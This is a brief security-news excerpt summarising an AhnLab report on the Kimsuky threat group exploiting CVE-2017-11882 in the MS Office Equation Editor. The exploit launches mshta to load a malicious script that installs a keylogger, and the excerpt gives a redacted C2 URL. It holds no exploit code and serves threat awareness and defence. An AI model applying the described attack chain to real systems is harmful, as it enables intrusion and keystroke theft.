all InfoSec news
Keylogger Installed Using MS Office Equation Editor Vulnerability (Kimsuky)
Malware Analysis, News and Indicators - Latest topics malware.news
AhnLab SEcurity intelligence Center (ASEC) has identified the details of the Kimsuky threat group recently exploiting a vulnerability (CVE-2017-11882) in the equation editor included in MS Office (EQNEDT32.EXE) to distribute a keylogger. The threat actor distributed the keylogger by exploiting the vulnerability to run a page with an embedded malicious script with the mshta process.
Figure 1. mshta.exe executed via the equation editor program (EQNEDT32.exe)
Figure 2. The C2 server screen (mshta.exe)
The page that mshta connects to is http://xxxxxxxxxxx.xxxxxx.xxxxxxxx.com/images/png/error.php …
actor ahnlab asec center cve cve-2017-11882 distributed editor embedded equation equation editor exploiting intelligence keylogger kimsuky malicious malware analysis ms office office page run script security security intelligence threat threat actor threat group using vulnerability